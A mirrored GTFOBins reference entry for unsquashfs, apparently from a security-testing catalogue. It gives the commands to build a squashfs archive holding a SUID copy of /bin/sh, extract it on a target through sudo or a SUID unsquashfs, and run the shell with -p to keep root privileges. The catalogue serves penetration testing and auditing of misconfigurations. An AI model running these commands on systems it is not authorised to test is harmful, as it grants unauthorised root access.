mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-27 23:38:29 +01:00
07dca76e95
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
22 lines
497 B
Markdown
22 lines
497 B
Markdown
---
|
|
description: |
|
|
`unsquashfs` preserve the SUID bit when extracting the file system. Prepare an archive beforehand with the following commands as root:
|
|
|
|
```
|
|
cp /bin/sh .
|
|
chmod +s sh
|
|
mksquashfs sh shell
|
|
```
|
|
|
|
Extract it on the target, then run the SUID shell as usual (omitting the `-p` where appropriate).
|
|
functions:
|
|
sudo:
|
|
- code: |
|
|
sudo unsquashfs shell
|
|
./squashfs-root/sh -p
|
|
suid:
|
|
- code: |
|
|
./unsquashfs shell
|
|
./squashfs-root/sh -p
|
|
---
|